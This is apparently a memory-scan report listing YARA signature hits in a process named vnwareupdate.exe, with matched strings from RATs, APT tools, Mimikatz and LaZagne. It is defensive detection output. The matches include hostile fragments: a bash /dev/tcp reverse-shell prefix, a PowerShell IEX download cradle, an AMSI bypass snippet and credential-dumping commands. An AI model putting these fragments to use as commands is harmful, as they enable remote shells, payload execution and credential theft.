Process Memory Space: vnwareupdate.exe PID: 2540	Disclosed_0day_POCs_injector	Detects POC code from disclosed 0day hacktool set	Florian Roth	0xd7f3a4:$x2: Cannot write the shellcode in the process memory, error: 0xd7f3fb:$x3: /s shellcode_file PID: shellcode injection. 0xd7f444:$x4: /d dll_file PID: dll injection via LoadLibrary(). 0xd7f3fb:$x5: /s shellcode_file PID 0xd7f493:$x5: /s shellcode_file PID 0xd7f4c6:$x6: Shellcode copied in memory: OK 0xd7f502:$x7: Usage of the injector. 0xd7f537:$x8: KO: cannot obtain the SeDebug privilege.
Process Memory Space: vnwareupdate.exe PID: 2540	ProcessInjector_Gen	Detects a process injection utility that can be used ofr good and bad purposes	Florian Roth	0xd3d796:$x1: Error injecting remote thread in process: 0xd3d7dd:$s5: [-] Error getting access to process: %ld! 0xd3d824:$s6: --process-name <name> Process name to inject 0xd3d870:$s12: No injection target has been provided! 0xd3d8b5:$s17: [-] An app path is required when not injecting!
Process Memory Space: vnwareupdate.exe PID: 2540	Lazagne_PW_Dumper	Detects Lazagne PW Dumper	Markus Neis / Florian Roth	0xd41360:$s1: Crypto.Hash 0xd41389:$s2: laZagne 0xd413ae:$s3: impacket.winregistry
Process Memory Space: vnwareupdate.exe PID: 2540	SUSP_shellpop_Bash	Detects susupicious bash command	Tobias Michalski	0xd36ea7:$: /bin/bash -i >& /dev/tcp/
Process Memory Space: vnwareupdate.exe PID: 2540	HKTL_Lazagne_Gen_18	Detects Lazagne password extractor hacktool	Florian Roth	0xd20d6f:$x1: lazagne.config.powershell_execute( 0xd20daf:$x2: creddump7.win32. 0xd20dd4:$x3: lazagne.softwares.windows.hashdump 0xd20e0b:$x4: .softwares.memory.libkeepass.common(
Process Memory Space: vnwareupdate.exe PID: 2540	HKTL_NoPowerShell	Detects NoPowerShell hack tool	Florian Roth	0xd1fab6:$x1: \NoPowerShell.pdb
Process Memory Space: vnwareupdate.exe PID: 2540	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0xd7155c:$x1: reflective_inject_dll 0xd71641:$x1: reflective_inject_dll 0xd71674:$x1: reflective_inject_dll 0xdc27eb:$x1: reflective_inject_dll 0xdc281e:$x2: ImportError: pupy builtin module not found ! 0xdc2868:$x3: please start pupy from either it's exe stub or it's reflective DLLR; 0xd715fb:$x4: [INJECT] inject_dll. 0xdc28ca:$x4: [INJECT] inject_dll. 0xdc28fc:$x5: import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))
Process Memory Space: vnwareupdate.exe PID: 2540	Suspicious_Script_Running_from_HTTP	Detects a suspicious	Florian Roth	0xd6fd08:$s1: cmd /C script:http:// 0xd6fd39:$s2: cmd /C script:https:// 0xd6fd6b:$s3: cmd.exe /C script:http:// 0xd6fda0:$s4: cmd.exe /C script:https://
Process Memory Space: vnwareupdate.exe PID: 2540	SUSP_Netsh_PortProxy_Command	Detects a suspicious command line with netsh and the portproxy command	Florian Roth	0xd189f1:$x1: netsh interface portproxy add v4tov4 listenport=
Process Memory Space: vnwareupdate.exe PID: 2540	Nanocore_RAT_Gen_1	Detetcs the Nanocore RAT and similar malware	Florian Roth	0xe03ea8:$x2: RunPE1 0xe03ecc:$x3: 082B8C7D3F9105DC66A7E3267C9750CF43E9D325 0xe03f12:$x4: $374e0775-e893-4e72-806c-a8d880a49ae7 0xe03f55:$x5: Monitorinjection
Process Memory Space: vnwareupdate.exe PID: 2540	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd4902a:$x1: NanoCore.ClientPluginHost 0xe041cd:$x1: NanoCore.ClientPluginHost 0xe04204:$x2: IClientNetworkHost 0xe04234:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: vnwareupdate.exe PID: 2540	APT_Turla_Agent_BTZ_Gen_1	Detects Turla Agent.BTZ	Florian Roth	0xd33516:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0xd3e476:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0xd33595:$s1: release mutex - %u (%u)(%u) 0xd335ff:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0xd3364e:$s4: MakeFile Error(%d) copy file to temp file %s 0xd33698:$s5: %s%%s08x.tmp 0xd336c2:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0xd3371d:$s7: Mutex_Log 0xd337c2:$s10: Error: pos(%d) > CmdSize(%d) 0xd335d9:$s11: \win.com 0xd337fe:$s11: \win.com 0xd3e74f:$s11: \win.com 0xd33825:$s12: Error(%d) run %s 0xd33855:$s13: %02d.%02d.%04d Log begin: 0xd3e70d:$s13: %02d.%02d.%04d Log begin:
Process Memory Space: vnwareupdate.exe PID: 2540	APT_Malware_CommentCrew_MiniASP	CommentCrew Malware MiniASP APT	Florian Roth	0xe7b031:$x2: run http://%s/logo.png setup.exe 0xd66515:$z1: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 0xe7b09c:$z1: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 0xe7b101:$z2: Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit) 0xe7b14f:$z3: User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC 0xe7b1b4:$s1: http://%s/device_command.asp?device_id=%s&cv=%s&command=%s 0xe7b20c:$s2: kill process error! 0xe7b23d:$s3: kill process success! 0xe7b270:$s4: pickup command error! 0xe7b2a3:$s5: http://%s/record.asp?device_t=%s&key=%s&device_id=%s&cv=%s&result=%s 0xdb2211:$s6: no command 0xe7b305:$s6: no command 0xe7b37c:$s8: command is null! 0xe7b3aa:$s9: pickup command Ok! 0xe7b3db:$s10: http://%s/result_%s.htm
Process Memory Space: vnwareupdate.exe PID: 2540	IMPLANT_3_v1	X-Agent/CHOPSTICK Implant by APT28	US CERT	0xe53d49:$STR1: >process isn't exist<
Process Memory Space: vnwareupdate.exe PID: 2540	Industroyer_Portscan_3_Output	Detects Industroyer related custom port scaner output file	Florian Roth	0xd86743:$s1: WSA library load complite. 0x5648a4:$s2: Connection refused 0xd8677b:$s2: Connection refused
Process Memory Space: vnwareupdate.exe PID: 2540	Industroyer_Malware_5	Detects Industroyer related malware	Florian Roth	0xd87a93:$x1: D2MultiCommService.exe 0xd87ac7:$x2: Crash104.dll 0xd87af1:$x3: iec104.log 0xd87b19:$x4: IEC-104 client: ip=%s; port=%s; ASDU=%u 0xd87b5f:$s1: Error while getaddrinfo executing: %d 0xd87ba2:$s2: return info-Remote command 0xd87bda:$s3: Error killing process ... 0xd87c11:$s4: stop_comm_service_name 0xd87c45:$s5: 1 Data exchange: Send: %d (%s)
Process Memory Space: vnwareupdate.exe PID: 2540	Unit78020_Malware_Gen1	Detects malware by Chinese APT PLA Unit 78020 - Generic Rule	Florian Roth	0xe18087:$x2: POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1 0xe180d2:$x3: GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1 0xe182c0:$a2: User-Agent: Netscape 0xe19195:$a2: User-Agent: Netscape 0xe183ea:$s2: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 0xe191c7:$s2: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 0xe18578:$s7: /%d%s%d 0xe1862c:$s11: GET %dHTTP/1.1 0xe19395:$s11: GET %dHTTP/1.1 0xe18659:$s12: POST http://%ws:%d/%d%s%dHTTP/1.1 0xe19136:$s12: POST http://%ws:%d/%d%s%dHTTP/1.1 0xe18699:$s13: PeekNamePipe 0xe19341:$s13: PeekNamePipe 0xe186c4:$s14: Normal.dot 0xe186ed:$s15: R_eOR_eOR_eO)CiOS_eO 0xe1874b:$s17: %s %s %s %s %d %d %d %d
Process Memory Space: vnwareupdate.exe PID: 2540	Unit78020_Malware_Gen3	Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong	Florian Roth	0xe190f8:$x1: GET http://%ws:%d/%d%s%dHTTP/1.1 0xe18659:$x2: POST http://%ws:%d/%d%s%dHTTP/1.1 0xe19136:$x2: POST http://%ws:%d/%d%s%dHTTP/1.1 0xe182c0:$s1: User-Agent: Netscape 0xe19195:$s1: User-Agent: Netscape 0xe183ea:$s2: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 0xe191c7:$s2: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 0xe192ef:$s5: MM.exe 0xe18699:$s7: PeekNamePipe 0xe19341:$s7: PeekNamePipe 0xe1936b:$s8: Host: %ws:%d 0xe1862c:$s9: GET %dHTTP/1.1 0xe19395:$s9: GET %dHTTP/1.1 0xe193c2:$s10: SCHANNEL.DLL
Process Memory Space: vnwareupdate.exe PID: 2540	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0xd2108c:$s2: _ScreenshotLogger 0xd210bb:$s3: _PasswordStealer
Process Memory Space: vnwareupdate.exe PID: 2540	WindowsShell_s3	Detects simple Windows shell - file s3.exe	Florian Roth	0xe0817a:$s1: cmd - execute cmd.exe 0xe089ea:$s1: cmd - execute cmd.exe 0xe090e8:$s1: cmd - execute cmd.exe 0xe081ed:$s3: get <remote> <local> - download file 0xe08a5d:$s3: get <remote> <local> - download file 0xe0912c:$s3: get <remote> <local> - download file 0xe0822f:$s4: [ simple remote shell for windows v3 0xe082a9:$s6: put <local> <remote> - upload file 0xe091a6:$s6: put <local> <remote> - upload file 0xe082e9:$s7: term - terminate remote client 0xe091e6:$s7: term - terminate remote client 0xe08371:$s9: -l Listen for incoming connections 0xe08715:$s9: -l Listen for incoming connections 0xe08b8f:$s9: -l Listen for incoming connections
Process Memory Space: vnwareupdate.exe PID: 2540	WindosShell_s1	Detects simple Windows shell - file s1.exe	Florian Roth	0xe085dc:$s1: [ executing cmd.exe 0xe0860d:$s2: [ simple remote shell for windows v1 0xe0864f:$s3: -p <number> Port number to use (default is 443) 0xe0869d:$s4: usage: s1 <address> [options] 0xe086d8:$s5: [ waiting for connections on %s 0xe08371:$s6: -l Listen for incoming connections 0xe08715:$s6: -l Listen for incoming connections 0xe08b8f:$s6: -l Listen for incoming connections 0xe0875f:$s7: [ connection from %s 0xe08791:$s8: [ %c%c requires parameter 0xe08e2f:$s8: [ %c%c requires parameter
Process Memory Space: vnwareupdate.exe PID: 2540	WindowsShell_Gen	Detects simple Windows shell - from files keygen.exe, s1.exe, s2.exe, s3.exe, s4.exe	Florian Roth	0xe08791:$s0: [ %c%c requires parameter 0xe08e2f:$s0: [ %c%c requires parameter 0xe08e66:$s1: [ %s : %i 0xe08e8d:$s2: [ %s : %s
Process Memory Space: vnwareupdate.exe PID: 2540	WindowsShell_Gen2	Detects simple Windows shell - from files s3.exe, s4.exe	Florian Roth	0xe0817a:$s1: cmd - execute cmd.exe 0xe089ea:$s1: cmd - execute cmd.exe 0xe090e8:$s1: cmd - execute cmd.exe 0xe081ed:$s2: get <remote> <local> - download file 0xe08a5d:$s2: get <remote> <local> - download file 0xe0912c:$s2: get <remote> <local> - download file 0xe082a9:$s4: put <local> <remote> - upload file 0xe091a6:$s4: put <local> <remote> - upload file 0xe082e9:$s5: term - terminate remote client 0xe091e6:$s5: term - terminate remote client 0xe0926c:$s7: [ error : received %i bytes
Process Memory Space: vnwareupdate.exe PID: 2540	PassCV_Sabre_Malware_2	PassCV Malware mentioned in Cylance Report	Florian Roth	0xd5715e:$x1: ncProxyXll 0xd572c9:$x1: ncProxyXll 0xddd627:$x1: ncProxyXll 0xd57186:$s1: Uniscribe.dll 0xddd64f:$s1: Uniscribe.dll 0x1ff82d:$s2: WS2_32.dll 0x205fcb:$s2: WS2_32.dll 0xd726e4:$s2: WS2_32.dll 0xddd67a:$s2: WS2_32.dll 0xe7c892:$s2: WS2_32.dll 0xddd699:$s3: ProxyDll 0xddd6bf:$s4: JDNSAPI.dll 0xddd6e8:$s5: x64.dat 0xddd70d:$s6: LSpyb2
Process Memory Space: vnwareupdate.exe PID: 2540	Turla_APT_Malware_Gen1	Detects Turla malware (based on sample used in the RUAG APT case)	Florian Roth	0xdfcea2:$x1: too long data for this type of transport 0xdfcee8:$x2: not enough server resources to complete operation 0xdfcf37:$x3: Task not execute. Arg file failed. 0xdfcfb3:$s1: peer has closed the connection 0xdfcfef:$s2: tcpdump.exe 0xdfd018:$s3: windump.exe 0xdfd041:$s4: dsniff.exe 0xd7d5c2:$s5: wireshark.exe 0xdfd069:$s5: wireshark.exe 0xdfd094:$s6: ethereal.exe 0xdfd0be:$s7: snoop.exe 0xdfd0e5:$s8: ettercap.exe 0xdfd10f:$s9: miniport.dat 0xdfd13a:$s10: net_password=%s
Process Memory Space: vnwareupdate.exe PID: 2540	Turla_APT_Malware_Gen2	Detects Turla malware (based on sample used in the RUAG APT case)	Florian Roth	0xdfd3e2:$x1: Internal command not support =(( 0xdfd420:$x2: L\|-1\|AS_CUR_USER:OpenProcessToken():%d, %s\| 0xdfd469:$x3: L\|-1\|CreateProcessAsUser():%d, %s\| 0xdfd425:$x4: AS_CUR_USER:OpenProcessToken():%d 0xdfd4a9:$x4: AS_CUR_USER:OpenProcessToken():%d 0xdfd4e8:$x5: L\|-1\|AS_CUR_USER:LogonUser():%d, %s\| 0xdfd52a:$x6: L\|-1\|try to run dll %s with user priv\| 0xdfd5da:$x9: Plugin dll stop failed. 0xdfd610:$x10: AS_USER:LogonUser():%d 0xdfcb8c:$s2: msimghlp.dll 0xdfd66d:$s2: msimghlp.dll 0xdfd697:$s3: ximarsh.dll 0xdfd6c0:$s4: msximl.dll 0xdfd6e8:$s5: INTERNAL.dll 0xdfd745:$s7: ieuser.exe
Process Memory Space: vnwareupdate.exe PID: 2540	Turla_APT_Malware_Gen3	Detects Turla malware (based on sample used in the RUAG APT case)	Florian Roth	0xdfda5b:$x2: WaitMutex Abandoned %p 0xdfda8f:$x3: OPER\|Wrong config: no port\| 0xdfdac8:$x4: OPER\|Wrong config: no lastconnect\| 0xdfdb08:$x5: OPER\|Wrong config: empty address\| 0xdfdb47:$x6: Trans task %d obj %s ACTIVE fail robj %s 0xdfdb8d:$x7: OPER\|Wrong config: no auth\| 0xdfdbc6:$x8: OPER\|Sniffer '%s' running... ooopppsss...\| 0xdfdd07:$s3: www.yahoo.com 0xdfdd59:$s5: www.bing.com 0xdfdd83:$s6: %s: http://%s%s 0xdfddb0:$s7: /javascript/view.php 0xdfdde2:$s8: Task %d failed %s,%d 0xdfd9e8:$s9: Mozilla/4.0 (compatible; MSIE %d.0;
Process Memory Space: vnwareupdate.exe PID: 2540	redSails_PY	Detects Red Sails Hacktool - Python	Florian Roth	0xd6734a:$x1: Gained command shell on host 0xd67384:$x2: [!] Received an ERROR in shell() 0xd673c2:$x3: Target IP address with backdoor installed 0xd67409:$x4: Open backdoor port on target machine 0xd6744b:$x5: Backdoor port to open on victim machine
Process Memory Space: vnwareupdate.exe PID: 2540	APT_Malware_PutterPanda_Rel	Detects an APT malware related to PutterPanda	Florian Roth	0xe76c7f:$x0: app.stream-media.net 0xe76cb1:$x1: File %s does'nt exist or is forbidden to acess! 0xe76cfe:$s6: GetProcessAddresss of pHttpQueryInfoA Failed! 0xe76d49:$s7: Connect %s error! 0xe76d78:$s9: Download file %s successfully! 0xe76db5:$s10: index.tmp 0xe76ddd:$s11: Execute PE Successfully 0xe76e13:$s13: aa/22/success.xml 0xe76e43:$s16: aa/22/index.asp 0xe76e71:$s18: File %s a Non-Pe File 0xe76ea5:$s19: SendRequset error! 0xe76ed6:$s20: filelist[%d]=%s
Process Memory Space: vnwareupdate.exe PID: 2540	Rehashed_RAT_2	Detects malware from Rehashed RAT incident	Florian Roth	0xd6cf11:$x1: dalat.dulichovietnam.net 0xd6cf47:$x2: web.Thoitietvietnam.org 0xd6cf7c:$a1: User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64) 0xd6cfdf:$a2: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3 0xd6d074:$s1: GET /%s%s%s%s HTTP/1.1 0xd6d0a8:$s2: http://%s:%d/%s%s%s%s 0xd6d0db:$s3: {521338B8-3378-58F7-AFB9-E7D35E683BF8}
Process Memory Space: vnwareupdate.exe PID: 2540	Malware_QA_vqgk	VT Research QA uploaded malware - file vqgk.dll	Florian Roth	0xd78deb:$x3: %d is an x86 process (can't inject x64 content) 0xd88492:$x3: %d is an x86 process (can't inject x64 content) 0xdea3c8:$x3: %d is an x86 process (can't inject x64 content) 0xd61122:$x4: %d is an x64 process (can't inject x86 content) 0xdea415:$x4: %d is an x64 process (can't inject x86 content) 0xd884df:$s2: Could not open process token: %d (%u) 0xdea4b3:$s2: Could not open process token: %d (%u) 0xd6116f:$s5: Failed to impersonate logged on user %d (%u) 0xd78ee5:$s5: Failed to impersonate logged on user %d (%u) 0xdea563:$s5: Failed to impersonate logged on user %d (%u) 0xd6120a:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xd78e38:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xd883da:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xdea5ad:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xd612d2:$s7: could not write to process memory: %d 0xdea614:$s7: could not write to process memory: %d 0xdea657:$s8: beacon.dll 0xd78e9f:$s9: Failed to impersonate token from %d (%u) 0xdea67f:$s9: Failed to impersonate token from %d (%u)
Process Memory Space: vnwareupdate.exe PID: 2540	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0xd71458:$x1: reflectively inject a dll into a process. 0xd7149f:$x2: ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid 0xd714f9:$x3: LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null 0xd7155c:$x4: reflective_inject_dll 0xd71641:$x4: reflective_inject_dll 0xd71674:$x4: reflective_inject_dll 0xdc27eb:$x4: reflective_inject_dll 0xd7149f:$x5: ld_preload_inject_dll 0xd7158f:$x5: ld_preload_inject_dll 0xd715c2:$x6: get_pupy_config() -> string 0xd715fb:$x7: [INJECT] inject_dll. OpenProcess failed. 0xd7155c:$x8: reflective_inject_dll 0xd71641:$x8: reflective_inject_dll 0xd71674:$x8: reflective_inject_dll 0xdc27eb:$x8: reflective_inject_dll 0xd71674:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits) 0xd716d0:$x10: linux_inject_main
Process Memory Space: vnwareupdate.exe PID: 2540	IronPanda_DNSTunClient	Iron Panda malware DnsTunClient - file named.exe	Florian Roth	0xe1962b:$s1: dnstunclient -d or -domain <domain> 0xe1966c:$s2: dnstunclient -ip <server ip address> 0xe197af:$s5: taskkill /im conime.exe 0xe1983c:$s7: UDP error:can not bing the port(if there is unclosed the bind process?) 0xe198a1:$s8: use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s) 0xe1990a:$s9: error: packet num error.the connection have condurt,pls try later 0xe1996a:$s10: Coversation produce one error:%s,coversation fail 0xe199ba:$s11: try to add many same pipe to select group(or mark is too easy).
Process Memory Space: vnwareupdate.exe PID: 2540	IronPanda_Malware_Htran	Iron Panda Malware Htran	Florian Roth	0xe1a2e7:$s1: [-] Gethostbyname(%s) error:%s 0xe1a323:$s2: %s -<listen\|tran\|slave> <option> [-log logfile] 0xe42247:$s2: %s -<listen\|tran\|slave> <option> [-log logfile] 0xe1a370:$s3: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> 0xe1a3ce:$s4: [-] ERROR: Must supply logfile name. 0xe1a410:$s5: [SERVER]connection to %s:%d error 0xe43d6e:$s5: [SERVER]connection to %s:%d error 0xe4fb22:$s5: [SERVER]connection to %s:%d error 0xe6981b:$s5: [SERVER]connection to %s:%d error 0xe1a44f:$s6: [+] Make a Connection to %s:%d.... 0xe69a01:$s6: [+] Make a Connection to %s:%d.... 0xe1a48f:$s7: [+] Waiting another Client on port:%d.... 0xe69a85:$s7: [+] Waiting another Client on port:%d.... 0xe1a4d6:$s8: [+] Accept a Client on port %d from %s 0xe6995c:$s8: [+] Accept a Client on port %d from %s 0xe69acd:$s8: [+] Accept a Client on port %d from %s 0xe1a51a:$s9: [+] Make a Connection to %s:%d ...... 0xe1a55e:$s10: cmshared_get_ptr_from_atom 0xe1a598:$s10: cmshared_get_ptr_from_atom 0xe1a597:$s11: _cmshared_get_ptr_from_atom 0xe1a5d1:$s12: [+] OK! I Closed The Two Socket.
Process Memory Space: vnwareupdate.exe PID: 2540	PP_CN_APT_ZeroT_3	Detects malware from the Proofpoint CN APT ZeroT incident	Florian Roth	0xdc923b:$s1: /svchost.exe 0xdc9893:$s1: /svchost.exe 0xdc9ed3:$s1: /svchost.exe 0xdc9265:$s2: RasTls.dll 0xdc9b8b:$s2: RasTls.dll 0xdc9efd:$s2: RasTls.dll 0xdc928d:$s3: 20160620.htm 0xdc9300:$s3: 20160620.htm 0xdc9f25:$s3: 20160620.htm 0xdc9f50:$s3: 20160620.htm 0xdc92b7:$s4: * $l&$ 0xdc92db:$s5: dfjhmh 0xdc92ff:$s6: /20160620.htm 0xdc9f4f:$s6: /20160620.htm
Process Memory Space: vnwareupdate.exe PID: 2540	PP_CN_APT_ZeroT_5	Detects malware from the Proofpoint CN APT ZeroT incident	Florian Roth	0xdc9845:$x1: dbozcb 0xdc7c57:$s1: nflogger.dll 0xdc9869:$s1: nflogger.dll 0xdca1d4:$s1: nflogger.dll 0xdc923b:$s2: /svchost.exe 0xdc9893:$s2: /svchost.exe 0xdc9ed3:$s2: /svchost.exe 0xdc98bd:$s3: 1207.htm 0xdc98e4:$s3: 1207.htm 0xdc98e3:$s4: /1207.htm
Process Memory Space: vnwareupdate.exe PID: 2540	CN_APT_ZeroT_extracted_Mcutil	Chinese APT by Proofpoint ZeroT RAT - file Mcutil.dll	Florian Roth	0xdc84ce:$s1: LoaderDll.dll 0xdc84f9:$s2: QageBox1USER 0xdc8523:$s3: xhmowl 0xdc8547:$s4: ?KEYKY 0xdc856b:$s5: HH:mm:_s 0xdc8591:$s6: =licni] has maX0t
Process Memory Space: vnwareupdate.exe PID: 2540	Microcin_Sample_5	Malware sample mentioned in Microcin technical report by Kaspersky	Florian Roth	0xd6950a:$x1: Sorry, you are not fortuante ^_^, Please try other password dictionary 0xd6956f:$x2: DomCrack <IP> <UserName> <Password_Dic file path> <option> 0xd69659:$x5: No password found! 0xd69689:$x7: Can not found the Password Dictoonary file!
Process Memory Space: vnwareupdate.exe PID: 2540	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0xd8a7ee:$s2: logC.dll 0xd8a860:$s5: Logger Name:
Process Memory Space: vnwareupdate.exe PID: 2540	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0xd79abc:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
Process Memory Space: vnwareupdate.exe PID: 2540	JS_Suspicious_MSHTA_Bypass	Detects MSHTA Bypass	Florian Roth	0xd6dde4:$s1: mshtml,RunHTMLApplication 0xd79fb4:$s1: mshtml,RunHTMLApplication 0xd7a020:$s3: /c start mshta j
Process Memory Space: vnwareupdate.exe PID: 2540	JavaScript_Run_Suspicious	Detects a suspicious Javascript Run command	Florian Roth	0xd6f6cb:$s1: w = new ActiveXObject( 0xd6f6f6:$s2: w.Run(r);
Process Memory Space: vnwareupdate.exe PID: 2540	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0xdaaa0d:$s2: Auditcleaner 0xdaaa89:$s2: Auditcleaner 0xdb3153:$s11: elatedmonkey 0xdb31dc:$s11: elatedmonkey 0xdab340:$s17: ys.ratload.sh 0x2818eb:$elf1: catflap 0xda8c4a:$elf4: charm_saver 0xdae3e0:$elf8: ebbshave 0xdae45d:$elf8: ebbshave 0xdae7c8:$elf9: eggbasket 0xdae846:$elf9: eggbasket 0xdb1d49:$elf12: envoytomato 0xdb1dc4:$elf12: envoytomato 0xdb1a19:$elf14: estopmoonlit 0xdb1a95:$elf14: estopmoonlit 0xdb3f9c:$elf17: ghost_sparc 0xdb402e:$elf17: ghost_sparc 0xdb0a98:$elf18: jackpop 0xdb0b14:$elf18: jackpop 0xda6afc:$elf19: orleans_stride 0xda73f1:$elf21: seconddate
Process Memory Space: vnwareupdate.exe PID: 2540	Ysoserial_Payload_Spring1	Ysoserial Payloads - file Spring1.bin	Florian Roth	0xdc757b:$x1: ysoserial/Pwner
Process Memory Space: vnwareupdate.exe PID: 2540	Ysoserial_Payload	Ysoserial Payloads	Florian Roth	0xdc7782:$x1: ysoserial/payloads/ 0xdc77aa:$s1: StubTransletPayload 0xdc77db:$s2: Pwnrpw
Process Memory Space: vnwareupdate.exe PID: 2540	Ysoserial_Payload_3	Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin	Florian Roth	0xdc7a5b:$x1: ysoserialq 0xdc7a83:$s1: targetClassInterceptorMetadatat 0xdc7ac0:$s2: targetInstancet 0xdc7aed:$s3: targetClassL 0xdc7b17:$s4: POST_ACTIVATEsr 0xdc7b44:$s5: PRE_DESTROYsq
Process Memory Space: vnwareupdate.exe PID: 2540	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0xe1e3a2:$s11: sekurlsa::pth
Process Memory Space: vnwareupdate.exe PID: 2540	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0xdfeab5:$x1: sekurlsa::logonpasswords 0xdfeaf0:$x2: List tickets in MIT/Heimdall ccache 0xdfeb36:$x3: kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage %08x 0xdfeb8f:$x4: * Injecting ticket : 0xdfebc6:$x5: mimidrv.sys 0xdfebf4:$x6: Lists LM & NTLM credentials 0xdfec33:$x7: \_ kerberos - 0xdfec63:$x8: * unknow : 0xdfec93:$x9: \_ *Password replace -> 0xdfecce:$x10: KIWI_MSV1_0_PRIMARY_CREDENTIALS KO 0xdfed34:$x12: Switch to MINIDUMP :
Process Memory Space: vnwareupdate.exe PID: 2540	VUL_JQuery_FileUpload_CVE_2018_9206	Detects JQuery File Upload vulnerability CVE-2018-9206	Florian Roth	0xd2302a:$s1: error_reporting(E_ALL \| E_STRICT); 0xd2306a:$s2: require('UploadHandler.php'); 0xd230a5:$s3: $upload_handler = new UploadHandler();
Process Memory Space: vnwareupdate.exe PID: 2540	CACTUSTORCH	Detects CactusTorch Hacktool	Florian Roth	0xd75807:$x2: Copy the base64 encoded payload into the code variable below. 0xd75893:$x4: ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 0xd7590c:$x5: ' Author: Vincent Yiu (@vysecurity)
Process Memory Space: vnwareupdate.exe PID: 2540	APT_FIN7_Strings_Aug18_1	Detects strings from FIN7 report in August 2018	Florian Roth	0xd28cf7:$s1: &&call %a01%%a02% /e:jscript 0xd28d28:$s2: wscript.exe //b /e:jscript %TEMP% 0xd28d5e:$s3: w=wsc@ript /b 0xd28d82:$s4: @echo %w:@=%\|cmd 0xd28da7:$s5: & wscript //b /e:jscript
Process Memory Space: vnwareupdate.exe PID: 2540	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xd50278:$x1: GetKeyloggerLogsResponse 0xdb5c9c:$x1: GetKeyloggerLogsResponse 0xdb5cd2:$x2: get_Keylogger 0xdb5cfd:$x3: HandleGetKeyloggerLogsResponse 0xdb5d39:$s1: DoShellExecuteResponse 0xdb5d6d:$s2: GetPasswordsResponse 0xdb5d9f:$s3: GetStartupItemsResponse 0xdb5dd4:$s4: <GetGenReader>b__7 0xd503c1:$s5: RunHidden 0xd50429:$s5: RunHidden 0xd57a52:$s5: RunHidden 0xdb5e04:$s5: RunHidden
Process Memory Space: vnwareupdate.exe PID: 2540	OpCloudHopper_Malware_5	Detects malware from Operation Cloud Hopper	Florian Roth	0xdbbc31:$x1: CWINDOWSSYSTEMROOT 0xdbbc61:$x2: YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK 0xdbbc9f:$x3: NJK_JK_SED_PNJHGFUUGIOO_PIY 0xdbbcd8:$x4: c_VDGQBUl}YSB_C_VDlqSDYFU 0xdbbd0f:$s7: FALLINLOVE
Process Memory Space: vnwareupdate.exe PID: 2540	OpCloudHopper_WmiDLL_inMemory	Malware related to Operation Cloud Hopper - Page 25	Florian Roth	0xdb8793:$s1: wmi.dll 2>&1
